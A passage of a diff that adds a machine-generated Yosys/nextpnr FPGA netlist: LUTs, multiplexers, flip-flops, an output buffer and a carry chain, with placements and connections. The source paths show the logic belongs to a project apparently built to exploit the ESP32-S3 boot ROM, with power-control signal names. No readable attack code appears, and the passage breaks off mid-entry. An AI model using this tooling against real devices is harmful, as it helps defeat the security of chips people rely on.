"rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y13/LUT0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I1": [ 7889 ], + "I0": [ 7901 ], + "F": [ 7934 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y13/MUX0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7885 ], + "O": [ 7923 ], + "I1": [ 7935 ], + "I0": [ 7934 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1000101010101010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y13/LUT3", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7889 ], + "I2": [ 7932 ], + "I1": [ 7930 ], + "I0": [ 7901 ], + "F": [ 7926 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "10" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y13/LUT2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ 7901 ], + "F": [ 7925 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y13/MUX2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7885 ], + "O": [ 7922 ], + "I1": [ 7926 ], + "I0": [ 7925 ] + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y13/MUX1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7741 ], + "O": [ 7905 ], + "I1": [ 7923 ], + "I0": [ 7922 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "11111000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/LUT5", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7889 ], + "I1": [ 7902 ], + "I0": [ 7901 ], + "F": [ 7918 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "11111000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/LUT4", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7889 ], + "I1": [ 7902 ], + "I0": [ 7901 ], + "F": [ 7917 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/MUX4", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7885 ], + "O": [ 7910 ], + "I1": [ 7918 ], + "I0": [ 7917 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1_LUT4_F": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1111100010001000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7889 ], + "I2": [ 7556 ], + "I1": [ 7902 ], + "I0": [ 7901 ], + "F": [ 7913 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "1000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I1": [ 7902 ], + "I0": [ 7901 ], + "F": [ 7912 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/MUX6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7885 ], + "O": [ 7909 ], + "I1": [ 7913 ], + "I0": [ 7912 ] + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O": { + "hide_name": 0, + "type": "MUX2_LUT6", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y11/MUX5", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:160.14-160.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7741 ], + "O": [ 7907 ], + "I1": [ 7910 ], + "I0": [ 7909 ] + } + }, + "rst_DFF_Q_1": { + "hide_name": 0, + "type": "DFF", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y11/DFF0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:13.6-13.47", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input" + }, + "connections": { + "Q": [ 7902 ], + "D": [ 7907 ], + "CLK": [ 7419 ] + } + }, + "rst_DFF_Q": { + "hide_name": 0, + "type": "DFF", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y14/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:13.6-13.47", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input" + }, + "connections": { + "Q": [ 7901 ], + "D": [ 7905 ], + "CLK": [ 7419 ] + } + }, + "power_tx_reg_LUT4_I2": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "0000000011110100" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y13/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7889 ], + "I2": [ 7893 ], + "I1": [ 7902 ], + "I0": [ 7901 ], + "F": [ 7898 ] + } + }, + "power_tx_reg_LUT3_I2": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "11110100" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y13/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7893 ], + "I1": [ 7902 ], + "I0": [ 7901 ], + "F": [ 7897 ] + } + }, + "power_tx_reg_DFFS_Q_D_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y13/MUX6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7741 ], + "O": [ 7895 ], + "I1": [ 7898 ], + "I0": [ 7897 ] + } + }, + "power_tx_reg_DFFS_Q": { + "hide_name": 0, + "type": "DFFS", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y14/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:55.7-55.57", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "SET": "input", + "Q": "output", + "D": "input", + "CLK": "input" + }, + "connections": { + "SET": [ 8057 ], + "Q": [ 7893 ], + "D": [ 7895 ], + "CLK": [ 7419 ] + } + }, + "power_tx_OBUF_O": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + "NET_I": "NET", + "NET_O": "NET" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000101", + "NEXTPNR_BEL": "X46Y12/IOBA", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:6.12-6.20", + "&DRIVE=24": "00000000000000000000000000000001", + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "O": "output", + "I": "input" + }, + "connections": { + "O": [ 7410 ], + "I": [ 7893 ] + } + }, + "led_run_LUT4_I0_1": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1100100011000000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/LUT7", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7881 ], + "I2": [ 7889 ], + "I1": [ 7556 ], + "I0": [ 7737 ], + "F": [ 7883 ] + } + }, + "led_run_LUT4_I0": { + "hide_name": 0, + "type": "LUT4", + "parameters": { + "INIT": "1100100010001000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y14/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I3": "input", + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I3": [ 7885 ], + "I2": [ 7889 ], + "I1": [ 7556 ], + "I0": [ 7737 ], + "F": [ 7687 ] + } + }, + "led_run_LUT3_I0_F_MUX2_LUT5_I0": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/MUX6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "S0": "input", + "O": "output", + "I1": "input", + "I0": "input" + }, + "connections": { + "S0": [ 7885 ], + "O": [ 7690 ], + "I1": [ 7883 ], + "I0": [ 7880 ] + } + }, + "led_run_LUT3_I0": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "10000000" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/LUT6", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7881 ], + "I1": [ 7556 ], + "I0": [ 7737 ], + "F": [ 7880 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y12/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7878 ], + "I3": [ 8057 ], + "I1": [ 7635 ], + "I0": [ 8057 ], + "COUT": [ 7875 ], + "CIN": [ 8061 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y12/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7876 ], + "I3": [ 8057 ], + "I1": [ 7631 ], + "I0": [ 8057 ], + "COUT": [ 7872 ], + "CIN": [ 7875 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y12/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7873 ], + "I3": [ 8057 ], + "I1": [ 7626 ], + "I0": [ 8056 ], + "COUT": [ 7869 ], + "CIN": [ 7872 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y12/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7870 ], + "I3": [ 8057 ], + "I1": [ 7621 ], + "I0": [ 8057 ], + "COUT": [ 7866 ], + "CIN": [ 7869 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y12/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7867 ], + "I3": [ 8057 ], + "I1": [ 7610 ], + "I0": [ 8057 ], + "COUT": [ 7863 ], + "CIN": [ 7866 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y12/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7864 ], + "I3": [ 8057 ], + "I1": [ 7605 ], + "I0": [ 8056 ], + "COUT": [ 7860 ], + "CIN": [ 7863 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y12/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7861 ], + "I3": [ 8057 ], + "I1": [ 7600 ], + "I0": [ 8056 ], + "COUT": [ 7857 ], + "CIN": [ 7860 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y12/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7858 ], + "I3": [ 8057 ], + "I1": [ 7595 ], + "I0": [ 8057 ], + "COUT": [ 7854 ], + "CIN": [ 7857 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y12/ALU3", + "src": 